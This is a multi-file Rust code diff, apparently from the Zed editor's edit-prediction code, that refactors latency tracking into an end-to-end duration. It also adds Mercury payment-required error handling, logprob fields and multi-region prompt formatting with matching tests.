model_version: None,
+ e2e_latency_ms: None,
},
EditPredictionRejection {
request_id: first_id,
reason: EditPredictionRejectReason::Replaced,
was_shown: false,
model_version: None,
+ // 2 throttle waits (for 2nd and 3rd requests) elapsed
+ // between this request's start and response.
+ e2e_latency_ms: Some(2 * EditPredictionStore::THROTTLE_TIMEOUT.as_millis()),
}
]
);
@@ -1548,6 +2047,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Discarded,
false,
None,
+ None,
cx,
);
ep_store.reject_prediction(
@@ -1555,6 +2055,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Canceled,
true,
None,
+ None,
cx,
);
});
@@ -1574,6 +2075,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Discarded,
was_shown: false,
model_version: None,
+ e2e_latency_ms: None
}
);
assert_eq!(
@@ -1583,6 +2085,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Canceled,
was_shown: true,
model_version: None,
+ e2e_latency_ms: None
}
);
@@ -1594,6 +2097,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Discarded,
false,
None,
+ None,
cx,
);
}
@@ -1626,6 +2130,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Discarded,
false,
None,
+ None,
cx,
);
});
@@ -1646,6 +2151,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Discarded,
false,
None,
+ None,
cx,
);
});
@@ -1855,6 +2361,7 @@ fn empty_response() -> PredictEditsV3Response {
fn prompt_from_request(request: &PredictEditsV3Request) -> String {
zeta_prompt::format_zeta_prompt(&request.input, zeta_prompt::ZetaFormat::default())
+ .expect("default zeta prompt formatting should succeed in edit prediction tests")
}
fn assert_no_predict_request_ready(
@@ -1978,8 +2485,6 @@ async fn test_edit_prediction_basic_interpolation(cx: &mut TestAppContext) {
can_collect_data: false,
repo_url: None,
},
- buffer_snapshotted_at: Instant::now(),
- response_received_at: Instant::now(),
model_version: None,
};
@@ -2419,74 +2924,6 @@ async fn test_unauthenticated_without_custom_url_blocks_prediction_impl(cx: &mut
);
}
-#[gpui::test]
-fn test_compute_diff_between_snapshots(cx: &mut TestAppContext) {
- let buffer = cx.new(|cx| {
- Buffer::local(
- indoc! {"
- zero
- one
- two
- three
- four
- five
- six
- seven
- eight
- nine
- ten
- eleven
- twelve
- thirteen
- fourteen
- fifteen
- sixteen
- seventeen
- eighteen
- nineteen
- twenty
- twenty-one
- twenty-two
- twenty-three
- twenty-four
- "},
- cx,
- )
- });
-
- let old_snapshot = buffer.read_with(cx, |buffer, _| buffer.text_snapshot());
-
- buffer.update(cx, |buffer, cx| {
- let point = Point::new(12, 0);
- buffer.edit([(point..point, "SECOND INSERTION\n")], None, cx);
- let point = Point::new(8, 0);
- buffer.edit([(point..point, "FIRST INSERTION\n")], None, cx);
- });
-
- let new_snapshot = buffer.read_with(cx, |buffer, _| buffer.text_snapshot());
-
- let (diff, _) = compute_diff_between_snapshots(&old_snapshot, &new_snapshot).unwrap();
-
- assert_eq!(
- diff,
- indoc! {"
- @@ -6,10 +6,12 @@
- five
- six
- seven
- +FIRST INSERTION
- eight
- nine
- ten
- eleven
- +SECOND INSERTION
- twelve
- thirteen
- fourteen
- "}
- );
-}
-
#[gpui::test]
async fn test_diagnostic_jump_excludes_collaborator_regions(cx: &mut TestAppContext) {
fn set_collaborator_cursor(buffer: &Entity<Buffer>, row: u32, cx: &mut TestAppContext) {
@@ -2767,6 +3204,7 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) {
&snapshot_a,
editable_region_a.clone(),
None,
+ Duration::from_secs(0),
cx,
);
});
@@ -2830,6 +3268,7 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) {
&snapshot_b2,
editable_region_b.clone(),
None,
+ Duration::from_secs(0),
cx,
);
});
@@ -26,6 +26,14 @@ pub fn encode_cursor_in_patch(patch: &str, cursor_offset: Option<usize>) -> Stri
let mut line_start_offset = 0usize;
for line in patch.lines() {
+ if matches!(
+ DiffLine::parse(line),
+ DiffLine::Garbage(content)
+ if content.starts_with('#') && content.contains(CURSOR_POSITION_MARKER)
+ ) {
+ continue;
+ }
+
if !result.is_empty() {
result.push('\n');
}
@@ -846,6 +854,31 @@ mod tests {
assert_eq!(results, vec![(clean_patch, None)]);
}
+ #[test]
+ fn test_encode_cursor_in_patch_is_idempotent() {
+ let patch = indoc! {r#"
+ --- a/test.rs
+ +++ b/test.rs
+ @@ -1,2 +1,2 @@
+ -fn old() {}
+ +fn new_name() {}
+ # ^[CURSOR_POSITION]
+ "#};
+
+ let cursor_offset = "fn new_name() {}".find("name").unwrap();
+ let encoded_once = encode_cursor_in_patch(patch, Some(cursor_offset));
+ let encoded_twice = encode_cursor_in_patch(&encoded_once, Some(cursor_offset));
+
+ assert_eq!(encoded_once, encoded_twice);
+ assert_eq!(
+ encoded_once
+ .lines()
+ .filter(|line| line.contains(CURSOR_POSITION_MARKER))
+ .count(),
+ 1
+ );
+ }
+
#[test]
fn test_from_markdown_accepted_prediction_marker() {
let markdown = indoc! {r#"
@@ -19,10 +19,8 @@ struct FimRequestOutput {
request_id: String,
edits: Vec<(std::ops::Range<Anchor>, Arc<str>)>,
snapshot: BufferSnapshot,
- response_received_at: Instant,
inputs: ZetaPromptInput,
buffer: Entity<Buffer>,
- buffer_snapshotted_at: Instant,
}
pub fn request_prediction(
@@ -47,7 +45,7 @@ pub fn request_prediction(
let http_client = cx.http_client();
let cursor_point = position.to_point(&snapshot);
- let buffer_snapshotted_at = Instant::now();
+ let request_start = cx.background_executor().now();
let Some(settings) = (match provider {
settings::EditPredictionProvider::Ollama => settings.ollama.clone(),
@@ -119,7 +117,7 @@ pub fn request_prediction(
log::debug!(
"fim: completion received ({:.2}s)",
- (response_received_at - buffer_snapshotted_at).as_secs_f64()
+ (response_received_at - request_start).as_secs_f64()
);
let completion: Arc<str> = clean_fim_completion(&response_text).into();
@@ -135,10 +133,8 @@ pub fn request_prediction(
request_id,
edits,
snapshot,
- response_received_at,
inputs,
buffer,
- buffer_snapshotted_at,
})
});
@@ -151,10 +147,9 @@ pub fn request_prediction(
&output.snapshot,
output.edits.into(),
None,
- output.buffer_snapshotted_at,
- output.response_received_at,
output.inputs,
None,
+ cx.background_executor().now() - request_start,
cx,
)
.await,
@@ -1,37 +1,47 @@
use crate::{
DebugEvent, EditPredictionFinishedDebugEvent, EditPredictionId, EditPredictionModelInput,
- EditPredictionStartedDebugEvent, open_ai_response::text_from_response,
+ EditPredictionStartedDebugEvent, EditPredictionStore, open_ai_response::text_from_response,
prediction::EditPredictionResult, zeta::compute_edits,
};
use anyhow::{Context as _, Result};
use cloud_llm_client::EditPredictionRejectReason;
use futures::AsyncReadExt as _;
use gpui::{
- App, AppContext as _, Entity, Global, SharedString, Task,
- http_client::{self, AsyncBody, HttpClient, Method},
+ App, AppContext as _, Context, Entity, Global, SharedString, Task,
+ http_client::{self, AsyncBody, HttpClient, Method, StatusCode},
};
use language::{ToOffset, ToPoint as _};
use language_model::{ApiKeyState, EnvVar, env_var};
use release_channel::AppVersion;
-use serde::Serialize;
-use std::{mem, ops::Range, path::Path, sync::Arc, time::Instant};
+use serde::{Deserialize, Serialize};
+use std::{mem, ops::Range, path::Path, sync::Arc};
use zeta_prompt::ZetaPromptInput;
const MERCURY_API_URL: &str = "https://api.inceptionlabs.ai/v1/edit/completions";
pub struct Mercury {
pub api_token: Entity<ApiKeyState>,
+ payment_required_error: bool,
}
impl Mercury {
pub fn new(cx: &mut App) -> Self {
Mercury {
api_token: mercury_api_token(cx),
+ payment_required_error: false,
}
}
+ pub fn has_payment_required_error(&self) -> bool {
+ self.payment_required_error
+ }
+
+ pub fn set_payment_required_error(&mut self, payment_required_error: bool) {
+ self.payment_required_error = payment_required_error;
+ }
+
pub(crate) fn request_prediction(
- &self,
+ &mut self,
EditPredictionModelInput {
buffer,
snapshot,
@@ -41,7 +51,7 @@ impl Mercury {
debug_tx,
..
}: EditPredictionModelInput,
- cx: &mut App,
+ cx: &mut Context<EditPredictionStore>,
) -> Task<Result<Option<EditPredictionResult>>> {
self.api_token.update(cx, |key_state, cx| {
_ = key_state.load_if_needed(MERCURY_CREDENTIALS_URL, |s| s, cx);
@@ -57,7 +67,7 @@ impl Mercury {
let http_client = cx.http_client();
let cursor_point = position.to_point(&snapshot);
- let buffer_snapshotted_at = Instant::now();
+ let request_start = cx.background_executor().now();
let active_buffer = buffer.clone();
let result = cx.background_spawn(async move {
@@ -127,6 +137,7 @@ impl Mercury {
content: open_ai::MessageContent::Plain(prompt),
}],
stream: false,
+ stream_options: None,
max_completion_tokens: None,
stop: vec![],
temperature: None,
@@ -161,8 +172,13 @@ impl Mercury {
.await
.context("Failed to read response body")?;
- let response_received_at = Instant::now();
if !response.status().is_success() {
+ if response.status() == StatusCode::PAYMENT_REQUIRED {
+ anyhow::bail!(MercuryPaymentRequiredError(
+ mercury_payment_required_message(&body),
+ ));
+ }
+
anyhow::bail!(
"Request failed with status: {:?}\nBody: {}",
response.status(),
@@ -206,12 +222,25 @@ impl Mercury {
);
}
- anyhow::Ok((id, edits, snapshot, response_received_at, inputs))
+ anyhow::Ok((id, edits, snapshot, inputs))
});
- cx.spawn(async move |cx| {
- let (id, edits, old_snapshot, response_received_at, inputs) =
- result.await.context("Mercury edit prediction failed")?;
+ cx.spawn(async move |ep_store, cx| {
+ let result = result.await.context("Mercury edit prediction failed");
+
+ let has_payment_required_error = result
+ .as_ref()
+ .err()
+ .is_some_and(is_mercury_payment_required_error);
+
+ ep_store.update(cx, |store, cx| {
+ store
+ .mercury
+ .set_payment_required_error(has_payment_required_error);
+ cx.notify();
+ })?;
+
+ let (id, edits, old_snapshot, inputs) = result?;
anyhow::Ok(Some(
EditPredictionResult::new(
EditPredictionId(id.into()),
@@ -219,10 +248,9 @@ impl Mercury {
&old_snapshot,
edits.into(),
None,
- buffer_snapshotted_at,
- response_received_at,
inputs,
None,
+ cx.background_executor().now() - request_start,
cx,
)
.await,
@@ -315,6 +343,33 @@ fn push_delimited(prompt: &mut String, delimiters: Range<&str>, cb: impl FnOnce(
pub const MERCURY_CREDENTIALS_URL: SharedString =
SharedString::new_static("https://api.inceptionlabs.ai/v1/edit/completions");
pub const MERCURY_CREDENTIALS_USERNAME: &str = "mercury-api-token";
+
+#[derive(Debug, thiserror::Error)]
+#[error("{0}")]
+struct MercuryPaymentRequiredError(SharedString);
+
+#[derive(Deserialize)]
+struct MercuryErrorResponse {
+ error: MercuryErrorMessage,
+}
+
+#[derive(Deserialize)]
+struct MercuryErrorMessage {
+ message: String,
+}
+
+fn is_mercury_payment_required_error(error: &anyhow::Error) -> bool {
+ error
+ .downcast_ref::<MercuryPaymentRequiredError>()
+ .is_some()
+}
+
+fn mercury_payment_required_message(body: &[u8]) -> SharedString {
+ serde_json::from_slice::<MercuryErrorResponse>(body)
+ .map(|response| response.error.message.into())
+ .unwrap_or_else(|_| String::from_utf8_lossy(body).trim().to_string().into())
+}
+
pub static MERCURY_TOKEN_ENV_VAR: std::sync::LazyLock<EnvVar> = env_var!("MERCURY_AI_TOKEN");
struct GlobalMercuryApiKey(Entity<ApiKeyState>);
@@ -1,8 +1,4 @@
-use std::{
- ops::Range,
- sync::Arc,
- time::{Duration, Instant},
-};
+use std::{ops::Range, sync::Arc};
use cloud_llm_client::EditPredictionRejectReason;
use edit_prediction_types::{PredictedCursorPosition, interpolate_edits};
@@ -29,6 +25,7 @@ impl std::fmt::Display for EditPredictionId {
pub struct EditPredictionResult {
pub id: EditPredictionId,
pub prediction: Result<EditPrediction, EditPredictionRejectReason>,
+ pub e2e_latency: std::time::Duration,
}
impl EditPredictionResult {
@@ -38,15 +35,15 @@ impl EditPredictionResult {
edited_buffer_snapshot: &BufferSnapshot,
edits: Arc<[(Range<Anchor>, Arc<str>)]>,
cursor_position: Option<PredictedCursorPosition>,
- buffer_snapshotted_at: Instant,
- response_received_at: Instant,
inputs: ZetaPromptInput,
model_version: Option<String>,
+ e2e_latency: std::time::Duration,
cx: &mut AsyncApp,
) -> Self {
if edits.is_empty() {
return Self {
id,
+ e2e_latency,
prediction: Err(EditPredictionRejectReason::Empty),
};
}
@@ -62,6 +59,7 @@ impl EditPredictionResult {
else {
return Self {
id,
+ e2e_latency,
prediction: Err(EditPredictionRejectReason::InterpolatedEmpty),
};
};
@@ -70,6 +68,7 @@ impl EditPredictionResult {
Self {
id: id.clone(),
+ e2e_latency,
prediction: Ok(EditPrediction {
id,
edits,
@@ -78,8 +77,6 @@ impl EditPredictionResult {
edit_preview,
inputs,
buffer: edited_buffer.clone(),
- buffer_snapshotted_at,
- response_received_at,
model_version,
}),
}
@@ -94,8 +91,6 @@ pub struct EditPrediction {
pub snapshot: BufferSnapshot,
pub edit_preview: EditPreview,
pub buffer: Entity<Buffer>,
- pub buffer_snapshotted_at: Instant,
- pub response_received_at: Instant,
pub inputs: zeta_prompt::ZetaPromptInput,
pub model_version: Option<String>,
}
@@ -111,10 +106,6 @@ impl EditPrediction {
pub fn targets_buffer(&self, buffer: &Buffer) -> bool {
self.snapshot.remote_id() == buffer.remote_id()
}
-
- pub fn latency(&self) -> Duration {
- self.response_received_at - self.buffer_snapshotted_at
- }
}
impl std::fmt::Debug for EditPrediction {
@@ -169,8 +160,6 @@ mod tests {
can_collect_data: false,
repo_url: None,
},
- buffer_snapshotted_at: Instant::now(),
- response_received_at: Instant::now(),
};
cx.update(|cx| {
@@ -21,7 +21,6 @@ use std::{
ops::Range,
path::Path,
sync::Arc,
- time::Instant,
};
const SWEEP_API_URL: &str = "https://autocomplete.sweep.dev/backend/next_edit_autocomplete";
@@ -50,6 +49,7 @@ impl SweepAi {
.sweep
.privacy_mode;
let debug_info = self.debug_info.clone();
+ let request_start = cx.background_executor().now();
self.api_token.update(cx, |key_state, cx| {
_ = key_state.load_if_needed(SWEEP_CREDENTIALS_URL, |s| s, cx);
});
@@ -90,8 +90,6 @@ impl SweepAi {
.take(3)
.collect::<Vec<_>>();
- let buffer_snapshotted_at = Instant::now();
-
let result = cx.background_spawn(async move {
let text = inputs.snapshot.text();
@@ -255,7 +253,6 @@ impl SweepAi {
let mut body = String::new();
response.body_mut().read_to_string(&mut body).await?;
- let response_received_at = Instant::now();
if !response.status().is_success() {
let message = format!(
"Request failed with status: {:?}\nBody: {}",
@@ -289,19 +286,13 @@ impl SweepAi {
})
.collect::<Vec<_>>();
- anyhow::Ok((
- response.autocomplete_id,
- edits,
- inputs.snapshot,
- response_received_at,
- ep_inputs,
- ))
+ anyhow::Ok((response.autocomplete_id, edits, inputs.snapshot, ep_inputs))
});
let buffer = inputs.buffer.clone();
cx.spawn(async move |cx| {
- let (id, edits, old_snapshot, response_received_at, inputs) = result.await?;
+ let (id, edits, old_snapshot, inputs) = result.await?;
anyhow::Ok(Some(
EditPredictionResult::new(
EditPredictionId(id.into()),
@@ -309,10 +300,9 @@ impl SweepAi {
&old_snapshot,
edits.into(),
None,
- buffer_snapshotted_at,
- response_received_at,
inputs,
None,
+ cx.background_executor().now() - request_start,
cx,
)
.await,
@@ -22,7 +22,7 @@ use ui::SharedString;
use workspace::notifications::{ErrorMessagePrompt, NotificationId, show_app_notification};
use zeta_prompt::{ParsedOutput, ZetaPromptInput};
-use std::{env, ops::Range, path::Path, sync::Arc, time::Instant};
+use std::{env, ops::Range, path::Path, sync::Arc};
use zeta_prompt::{
CURSOR_MARKER, ZetaFormat, format_zeta_prompt, get_prefill, parse_zeta2_model_output,
prompt_input_contains_special_tokens, stop_tokens_for_format,
@@ -63,7 +63,7 @@ pub fn request_prediction_with_zeta(
};
let http_client = cx.http_client();
- let buffer_snapshotted_at = Instant::now();
+ let request_start = cx.background_executor().now();
let raw_config = store.zeta2_raw_config().cloned();
let preferred_experiment = store.preferred_experiment().map(|s| s.to_owned());
let open_ai_compatible_api_key = load_open_ai_compatible_api_key_if_needed(provider, cx);
@@ -100,7 +100,6 @@ pub fn request_prediction_with_zeta(
snapshot: BufferSnapshot,
edits: Vec<(Range<Anchor>, Arc<str>)>,
cursor_position: Option<PredictedCursorPosition>,
- received_response_at: Instant,
editable_range_in_buffer: Range<usize>,
model_version: Option<String>,
}
@@ -130,13 +129,14 @@ pub fn request_prediction_with_zeta(
return Err(anyhow::anyhow!("prompt contains special tokens"));
}
+ let formatted_prompt = format_zeta_prompt(&prompt_input, zeta_version);
+
if let Some(debug_tx) = &debug_tx {
- let prompt = format_zeta_prompt(&prompt_input, zeta_version);
debug_tx
.unbounded_send(DebugEvent::EditPredictionStarted(
EditPredictionStartedDebugEvent {
buffer: buffer.downgrade(),
- prompt: Some(prompt),
+ prompt: formatted_prompt.clone(),
position,
},
))
@@ -145,11 +145,11 @@ pub fn request_prediction_with_zeta(
log::trace!("Sending edit prediction request");
- let (request_id, output, model_version, usage) =
- if let Some(custom_settings) = &custom_server_settings {
+ let Some((request_id, output, model_version, usage)) =
+ (if let Some(custom_settings) = &custom_server_settings {
let max_tokens = custom_settings.max_output_tokens * 4;
- match custom_settings.prompt_format {
+ Some(match custom_settings.prompt_format {
EditPredictionPromptFormat::Zeta => {
let ranges = &prompt_input.excerpt_ranges;
let editable_range_in_excerpt = ranges.editable_350.clone();
@@ -186,7 +186,9 @@ pub fn request_prediction_with_zeta(
(request_id, parsed_output, None, None)
}
EditPredictionPromptFormat::Zeta2 => {
- let prompt = format_zeta_prompt(&prompt_input, zeta_version);
+ let Some(prompt) = formatted_prompt.clone() else {
+ return Ok((None, None));
+ };
let prefill = get_prefill(&prompt_input, zeta_version);
let prompt = format!("{prompt}{prefill}");
@@ -219,9 +221,11 @@ pub fn request_prediction_with_zeta(
(request_id, output_text, None, None)
}
_ => anyhow::bail!("unsupported prompt format"),
- }
+ })
} else if let Some(config) = &raw_config {
- let prompt = format_zeta_prompt(&prompt_input, config.format);
+ let Some(prompt) = format_zeta_prompt(&prompt_input, config.format) else {
+ return Ok((None, None));
+ };
let prefill = get_prefill(&prompt_input, config.format);
let prompt = format!("{prompt}{prefill}");
let environment = config
@@ -263,7 +267,7 @@ pub fn request_prediction_with_zeta(
None
};
- (request_id, output, None, usage)
+ Some((request_id, output, None, usage))
} else {
// Use V3 endpoint - server handles model/version selection and suffix stripping
let (response, usage) = EditPredictionStore::send_v3_request(
@@ -284,10 +288,11 @@ pub fn request_prediction_with_zeta(
range_in_excerpt: response.editable_range,
};
- (request_id, Some(parsed_output), model_version, usage)
- };
-
- let received_response_at = Instant::now();
+ Some((request_id, Some(parsed_output), model_version, usage))
+ })
+ else {
+ return Ok((None, None));
+ };
log::trace!("Got edit prediction response");
@@ -296,7 +301,7 @@ pub fn request_prediction_with_zeta(
range_in_excerpt: editable_range_in_excerpt,
}) = output
else {
- return Ok(((request_id, None), None));
+ return Ok((Some((request_id, None)), None));
};
let editable_range_in_buffer = editable_range_in_excerpt.start
@@ -342,7 +347,7 @@ pub fn request_prediction_with_zeta(
);
anyhow::Ok((
- (
+ Some((
request_id,
Some(Prediction {
prompt_input,
@@ -350,18 +355,20 @@ pub fn request_prediction_with_zeta(
snapshot: snapshot.clone(),
edits,
cursor_position,
- received_response_at,
editable_range_in_buffer,
model_version,
}),
- ),
+ )),
usage,
))
}
});
cx.spawn(async move |this, cx| {
- let (id, prediction) = handle_api_response(&this, request_task.await, cx)?;
+ let Some((id, prediction)) = handle_api_response(&this, request_task.await, cx)? else {
+ return Ok(None);
+ };
+ let request_duration = cx.background_executor().now() - request_start;
let Some(Prediction {
prompt_input: inputs,
@@ -369,13 +376,13 @@ pub fn request_prediction_with_zeta(
snapshot: edited_buffer_snapshot,
edits,
cursor_position,
- received_response_at,
editable_range_in_buffer,
model_version,
}) = prediction
else {
return Ok(Some(EditPredictionResult {
id,
+ e2e_latency: request_duration,
prediction: Err(EditPredictionRejectReason::Empty),
}));
};
@@ -413,6 +420,7 @@ pub fn request_prediction_with_zeta(
&edited_buffer_snapshot,
editable_range_in_buffer,
example_spec,
+ request_duration,
cx,
);
})
@@ -428,10 +436,9 @@ pub fn request_prediction_with_zeta(
&edited_buffer_snapshot,
edits.into(),
cursor_position,
- buffer_snapshotted_at,
- received_response_at,
inputs,
model_version,
+ request_duration,
cx,
)
.await,
@@ -580,6 +587,7 @@ pub(crate) fn edit_prediction_accepted(
let request_id = current_prediction.prediction.id.to_string();
let model_version = current_prediction.prediction.model_version;
+ let e2e_latency = current_prediction.e2e_latency;
let require_auth = custom_accept_url.is_none();
let client = store.client.clone();
let llm_token = store.llm_token.clone();
@@ -605,6 +613,7 @@ pub(crate) fn edit_prediction_accepted(
serde_json::to_string(&AcceptEditPredictionBody {
request_id: request_id.clone(),
model_version: model_version.clone(),
+ e2e_latency_ms: Some(e2e_latency.as_millis()),
})?
.into(),
);
@@ -21,6 +21,7 @@ clap = "4"
client.workspace = true
cloud_llm_client.workspace= true
collections.workspace = true
+db.workspace = true
debug_adapter_extension.workspace = true
dirs.workspace = true
extension.workspace = true
@@ -82,6 +82,10 @@ pub struct ExamplePrediction {
#[serde(default, skip_serializing_if = "Option::is_none")]
pub error: Option<String>,
pub provider: PredictionProvider,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub cumulative_logprob: Option<f64>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub avg_logprob: Option<f64>,
}
#[derive(Clone, Debug, Serialize, Deserialize)]
@@ -166,6 +170,10 @@ pub struct ExampleScore {
pub inserted_tokens: usize,
#[serde(default)]
pub deleted_tokens: usize,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub cumulative_logprob: Option<f64>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub avg_logprob: Option<f64>,
}
impl Example {
@@ -13,7 +13,7 @@ use std::ops::Range;
use std::sync::Arc;
use zeta_prompt::{
ZetaFormat, encode_patch_as_output_for_format, excerpt_range_for_format, format_zeta_prompt,
- output_end_marker_for_format, resolve_cursor_region,
+ multi_region, output_end_marker_for_format, resolve_cursor_region,
};
pub async fn run_format_prompt(
@@ -49,6 +49,24 @@ pub async fn run_format_prompt(
provider: args.provider,
});
}
+ PredictionProvider::TeacherMultiRegion(_)
+ | PredictionProvider::TeacherMultiRegionNonBatching(_) => {
+ step_progress.set_substatus("formatting teacher multi-region prompt");
+
+ let zeta_format = ZetaFormat::default();
+ let (editable_range, context_range) =
+ excerpt_range_for_format(zeta_format, &prompt_inputs.excerpt_ranges);
+
+ let prompt =
+ TeacherMultiRegionPrompt::format_prompt(example, editable_range, context_range);
+ example.prompt = Some(ExamplePrompt {
+ input: prompt,
+ expected_output: String::new(),
+ rejected_output: None,
+ prefill: None,
+ provider: args.provider,
+ });
+ }
PredictionProvider::Zeta2(zeta_format) => {
step_progress.set_substatus("formatting zeta2 prompt");
@@ -74,7 +92,7 @@ pub async fn run_format_prompt(
zeta2_output_for_patch(prompt_inputs, patch, None, zeta_format).ok()
});
- example.prompt = Some(ExamplePrompt {
+ example.prompt = prompt.map(|prompt| ExamplePrompt {
input: prompt,
expected_output,
rejected_output,
@@ -108,7 +126,7 @@ pub fn zeta2_output_for_patch(
return Ok(encoded_output);
}
- let (mut result, first_hunk_offset) =
+ let (result, first_hunk_offset) =
udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable_region).with_context(
|| {
format!(
@@ -118,6 +136,64 @@ pub fn zeta2_output_for_patch(
},
)?;
+ if version == ZetaFormat::V0317SeedMultiRegions {
+ let cursor_in_new = cursor_offset.map(|cursor_offset| {
+ let hunk_start = first_hunk_offset.unwrap_or(0);
+ result.floor_char_boundary((hunk_start + cursor_offset).min(result.len()))
+ });
+ return multi_region::encode_from_old_and_new_v0317(
+ &old_editable_region,
+ &result,
+ cursor_in_new,
+ zeta_prompt::CURSOR_MARKER,
+ multi_region::V0317_END_MARKER,
+ );
+ }
+
+ if version == ZetaFormat::V0318SeedMultiRegions {
+ let cursor_in_new = cursor_offset.map(|cursor_offset| {
+ let hunk_start = first_hunk_offset.unwrap_or(0);
+ result.floor_char_boundary((hunk_start + cursor_offset).min(result.len()))
+ });
+ return multi_region::encode_from_old_and_new_v0318(
+ &old_editable_region,
+ &result,
+ cursor_in_new,
+ zeta_prompt::CURSOR_MARKER,
+ multi_region::V0318_END_MARKER,
+ );
+ }
+
+ if version == ZetaFormat::V0316SeedMultiRegions {
+ let cursor_in_new = cursor_offset.map(|cursor_offset| {
+ let hunk_start = first_hunk_offset.unwrap_or(0);
+ result.floor_char_boundary((hunk_start + cursor_offset).min(result.len()))
+ });
+ return multi_region::encode_from_old_and_new_v0316(
+ &old_editable_region,
+ &result,
+ cursor_in_new,
+ zeta_prompt::CURSOR_MARKER,
+ multi_region::V0316_END_MARKER,
+ );
+ }
+
+ if version == ZetaFormat::V0306SeedMultiRegions {
+ let cursor_in_new = cursor_offset.map(|cursor_offset| {
+ let hunk_start = first_hunk_offset.unwrap_or(0);
+ result.floor_char_boundary((hunk_start + cursor_offset).min(result.len()))
+ });
+ return multi_region::encode_from_old_and_new(
+ &old_editable_region,
+ &result,
+ cursor_in_new,
+ zeta_prompt::CURSOR_MARKER,
+ zeta_prompt::seed_coder::END_MARKER,
+ zeta_prompt::seed_coder::NO_EDITS,
+ );
+ }
+
+ let mut result = result;
if let Some(cursor_offset) = cursor_offset {
// The cursor_offset is relative to the start of the hunk's new text (context + additions).
// We need to add where the hunk context matched in the editable region to compute
@@ -175,7 +251,10 @@ impl TeacherPrompt {
}
}
- if response.trim().ends_with(Self::NO_EDITS) {
+ if response
+ .trim_end_matches(&[' ', '\n', '`'])
+ .ends_with(Self::NO_EDITS)
+ {
return Ok(no_edits);
}
@@ -211,7 +290,6 @@ impl TeacherPrompt {
.context("editable region not found in prompt content")?;
let editable_region_start_line = excerpt[..editable_region_offset].matches('\n').count();
- // Use full context so cursor offset (relative to editable region start) aligns with diff content
let editable_region_lines = old_editable_region.lines().count() as u32;
let diff = language::unified_diff_with_context(
&old_editable_region,
@@ -263,6 +341,7 @@ impl TeacherPrompt {
.prompt_inputs
.as_ref()
.and_then(|pi| pi.related_files.as_deref());
+
let Some(related_files) = related_files else {
return "(No context)".to_string();
};
@@ -317,6 +396,202 @@ impl TeacherPrompt {
}
}
+pub struct TeacherMultiRegionPrompt;
+
+impl TeacherMultiRegionPrompt {
+ pub(crate) const USER_CURSOR_MARKER: &str = "<|user_cursor|>";
+ pub(crate) const NO_EDITS: &str = "NO_EDITS";
+
+ /// Truncate edit history to this number of last lines
+ const MAX_HISTORY_LINES: usize = 128;
+
+ pub fn format_prompt(
+ example: &Example,
+ editable_range: Range<usize>,
+ context_range: Range<usize>,
+ ) -> String {
+ let edit_history = Self::format_edit_history(&example.spec.edit_history);
+ let context = Self::format_context(example);
+ let cursor_excerpt = Self::format_cursor_excerpt(example, editable_range, context_range);
+
+ let prompt_template = crate::prompt_assets::get_prompt("teacher_multi_region.md");
+ let prompt = prompt_template
+ .replace("{{context}}", &context)
+ .replace("{{edit_history}}", &edit_history)
+ .replace("{{cursor_excerpt}}", &cursor_excerpt);
+
+ prompt
+ }
+
+ pub fn parse(example: &Example, response: &str) -> Result<(String, Option<ActualCursor>)> {
+ let no_edits = (String::new(), None);
+ if let Some(last_codeblock) = extract_last_codeblock(&response) {
+ if last_codeblock.trim() == Self::NO_EDITS {
+ return Ok(no_edits);
+ }
+ }
+
+ if response.trim().ends_with(Self::NO_EDITS) {
+ return Ok(no_edits);
+ }
+
+ let prompt_inputs = example
+ .prompt_inputs
+ .as_ref()
+ .context("example is missing prompt inputs")?;
+
+ let zeta_format = ZetaFormat::default();
+ let (editable_range, _) =
+ excerpt_range_for_format(zeta_format, &prompt_inputs.excerpt_ranges);
+ let excerpt = prompt_inputs.cursor_excerpt.as_ref();
+ let old_editable_region = &excerpt[editable_range.clone()];
+ let marker_offsets = multi_region::compute_marker_offsets(old_editable_region);
+
+ let codeblock =
+ extract_last_codeblock(&response).context("no codeblock found in model response")?;
+ let (start_num, end_num, raw_new_span) = multi_region::extract_marker_span(&codeblock)?;
+
+ let start_idx = start_num
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let end_idx = end_num
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+
+ if start_byte > end_byte {
+ return Err(anyhow!("start marker must come before end marker"));
+ }
+
+ let cursor_in_span = raw_new_span.find(Self::USER_CURSOR_MARKER);
+ let new_span = raw_new_span.replace(Self::USER_CURSOR_MARKER, "");
+
+ let old_span = &old_editable_region[start_byte..end_byte];
+ let mut new_span = new_span;
+ if old_span.ends_with('\n') && !new_span.ends_with('\n') && !new_span.is_empty() {
+ new_span.push('\n');
+ }
+ if !old_span.ends_with('\n') && new_span.ends_with('\n') {
+ new_span.pop();
+ }
+
+ let mut new_editable_region = String::new();
+ new_editable_region.push_str(&old_editable_region[..start_byte]);
+ new_editable_region.push_str(&new_span);
+ new_editable_region.push_str(&old_editable_region[end_byte..]);
+
+ let cursor_offset = cursor_in_span.map(|pos| start_byte + pos);
+
+ if old_editable_region.starts_with('\n') && !new_editable_region.starts_with('\n') {
+ new_editable_region.insert(0, '\n');
+ }
+
+ let editable_region_offset = editable_range.start;
+ let editable_region_start_line = excerpt[..editable_region_offset].matches('\n').count();
+
+ let editable_region_lines = old_editable_region.lines().count() as u32;
+ let diff = language::unified_diff_with_context(
+ old_editable_region,
+ &new_editable_region,
+ editable_region_start_line as u32,
